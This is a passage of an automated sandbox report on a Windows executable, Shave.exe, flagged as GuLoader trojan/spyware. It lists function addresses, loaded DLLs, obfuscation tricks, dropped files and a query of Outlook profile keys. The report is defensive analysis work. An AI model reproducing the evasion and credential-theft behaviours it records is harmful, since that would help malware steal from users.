Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3C150 3_2_04B3C150
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B30950 3_2_04B30950
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B33B58 3_2_04B33B58
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3A958 3_2_04B3A958
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3C142 3_2_04B3C142
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B36B40 3_2_04B36B40
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B35B48 3_2_04B35B48
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B33B4E 3_2_04B33B4E
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B570C0 3_2_04B570C0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B5D710 3_2_04B5D710
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B554A0 3_2_04B554A0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B522A0 3_2_04B522A0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B53880 3_2_04B53880
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B50680 3_2_04B50680
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B56A80 3_2_04B56A80
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B55AE0 3_2_04B55AE0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B528E0 3_2_04B528E0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B53EC0 3_2_04B53EC0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B50CC0 3_2_04B50CC0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B50036 3_2_04B50036
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B54820 3_2_04B54820
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B51620 3_2_04B51620
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B55E00 3_2_04B55E00
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B52C00 3_2_04B52C00
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B54E60 3_2_04B54E60
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B51C60 3_2_04B51C60
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B56440 3_2_04B56440
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B53240 3_2_04B53240
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B50040 3_2_04B50040
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B5EE48 3_2_04B5EE48
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B56DA0 3_2_04B56DA0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B53BA0 3_2_04B53BA0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B509A0 3_2_04B509A0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B55180 3_2_04B55180
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B51F80 3_2_04B51F80
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B541E0 3_2_04B541E0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B50FE0 3_2_04B50FE0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B541D0 3_2_04B541D0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B557C0 3_2_04B557C0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B525C0 3_2_04B525C0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B599C8 3_2_04B599C8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B56120 3_2_04B56120
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B52F20 3_2_04B52F20
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B54500 3_2_04B54500
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B51300 3_2_04B51300
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B56760 3_2_04B56760
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B53560 3_2_04B53560
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B50360 3_2_04B50360
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B50350 3_2_04B50350
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B56750 3_2_04B56750
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B54B40 3_2_04B54B40
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B51940 3_2_04B51940
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B59740 3_2_04B59740
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E41CF0 3_2_04E41CF0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E48470 3_2_04E48470
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4FB30 3_2_04E4FB30
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E41CE0 3_2_04E41CE0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4F4F0 3_2_04E4F4F0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E490F0 3_2_04E490F0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4C2F0 3_2_04E4C2F0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E404FA 3_2_04E404FA
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4D8D0 3_2_04E4D8D0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4A6D0 3_2_04E4A6D0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4BCB0 3_2_04E4BCB0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E48AB0 3_2_04E48AB0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4EEB0 3_2_04E4EEB0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E40E8B 3_2_04E40E8B
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4A090 3_2_04E4A090
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4D290 3_2_04E4D290
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E40E98 3_2_04E40E98
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4E870 3_2_04E4E870
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4B670 3_2_04E4B670
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4A07F 3_2_04E4A07F
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E40040 3_2_04E40040
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4CC41 3_2_04E4CC41
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E49A50 3_2_04E49A50
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4CC50 3_2_04E4CC50
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E41828 3_2_04E41828
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4B030 3_2_04E4B030
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4E230 3_2_04E4E230
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E41817 3_2_04E41817
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4C610 3_2_04E4C610
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E49410 3_2_04E49410
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4F810 3_2_04E4F810
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4001A 3_2_04E4001A
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4DBF0 3_2_04E4DBF0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4A9F0 3_2_04E4A9F0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4F1D0 3_2_04E4F1D0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E409D0 3_2_04E409D0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E48DD0 3_2_04E48DD0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4BFD0 3_2_04E4BFD0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4D5B0 3_2_04E4D5B0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4A3B0 3_2_04E4A3B0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E409BF 3_2_04E409BF
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4B990 3_2_04E4B990
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E48790 3_2_04E48790
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4EB90 3_2_04E4EB90
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E41360 3_2_04E41360
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E43360 3_2_04E43360
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E49D70 3_2_04E49D70
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4CF70 3_2_04E4CF70
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4E550 3_2_04E4E550
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4B350 3_2_04E4B350
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E41351 3_2_04E41351
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4C930 3_2_04E4C930
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E49730 3_2_04E49730
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E40508 3_2_04E40508
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4AD10 3_2_04E4AD10
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4DF10 3_2_04E4DF10
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F0D88 3_2_379F0D88
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F5CB6 3_2_379F5CB6
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F3FB2 3_2_379F3FB2
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F36F0 3_2_379F36F0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F3008 3_2_379F3008
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F2238 3_2_379F2238
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F2920 3_2_379F2920
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F1B50 3_2_379F1B50
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F1470 3_2_379F1470
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F2FF8 3_2_379F2FF8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F36E1 3_2_379F36E1
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F2911 3_2_379F2911
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F0A10 3_2_379F0A10
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F0006 3_2_379F0006
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F0A01 3_2_379F0A01
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F1B3F 3_2_379F1B3F
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F2229 3_2_379F2229
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F0040 3_2_379F0040
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F0D78 3_2_379F0D78
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F1460 3_2_379F1460
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38315028 3_2_38315028
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831FC68 3_2_3831FC68
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38312968 3_2_38312968
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831D9A8 3_2_3831D9A8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831DE00 3_2_3831DE00
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38311E80 3_2_38311E80
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38319328 3_2_38319328
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_383117A0 3_2_383117A0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38315020 3_2_38315020
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831F810 3_2_3831F810
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38310012 3_2_38310012
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38319C18 3_2_38319C18
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38310040 3_2_38310040
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831CCA0 3_2_3831CCA0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831D0F8 3_2_3831D0F8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831D550 3_2_3831D550
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38319548 3_2_38319548
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831D999 3_2_3831D999
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831DDF1 3_2_3831DDF1
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831DDFF 3_2_3831DDFF
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38311E70 3_2_38311E70
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831E257 3_2_3831E257
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831E258 3_2_3831E258
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831E24A 3_2_3831E24A
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831E6B0 3_2_3831E6B0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831E6A0 3_2_3831E6A0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831E6AF 3_2_3831E6AF
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38310B30 3_2_38310B30
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38310B20 3_2_38310B20
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831EB08 3_2_3831EB08
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831EF60 3_2_3831EF60
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831EF51 3_2_3831EF51
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831F3B8 3_2_3831F3B8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38318BA0 3_2_38318BA0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831C3AE 3_2_3831C3AE
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38318B91 3_2_38318B91
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831178F 3_2_3831178F
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Shave.exe Code function: String function: 00402C41 appears 46 times
Sample file is different than original file name gathered from version info
Source: Shave.exe, 00000003.00000002.3279604982.0000000004BB2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Shave.exe
Uses 32bit PE files
Source: Shave.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/5@7/5
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040336C
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_004046FF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004046FF
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_00402104 CoCreateInstance, 0_2_00402104
Source: C:\Users\user\Desktop\Shave.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Mutant created: NULL
Source: C:\Users\user\Desktop\Shave.exe File created: C:\Users\user\AppData\Local\Temp\nsv5BEB.tmp Jump to behavior
Source: Shave.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Shave.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Shave.exe Virustotal: Detection: 45%
Source: C:\Users\user\Desktop\Shave.exe File read: C:\Users\user\Desktop\Shave.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Shave.exe "C:\Users\user\Desktop\Shave.exe"
Source: C:\Users\user\Desktop\Shave.exe Process created: C:\Users\user\Desktop\Shave.exe "C:\Users\user\Desktop\Shave.exe"
Source: C:\Users\user\Desktop\Shave.exe Process created: C:\Users\user\Desktop\Shave.exe "C:\Users\user\Desktop\Shave.exe" Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: Shave.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.2342825551.0000000004332000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2342460807.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Shave.exe PID: 1216, type: MEMORYSTR
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_6F971B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_6F971B63
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_6F972FD0 push eax; ret 0_2_6F972FFE
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_004020ED push E9004081h; iretd 3_2_004020F2
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_00159C30 push esp; retf 0017h 3_2_00159D55
Drops PE files
Source: C:\Users\user\Desktop\Shave.exe File created: C:\Users\user\AppData\Local\Temp\nsa5D43.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
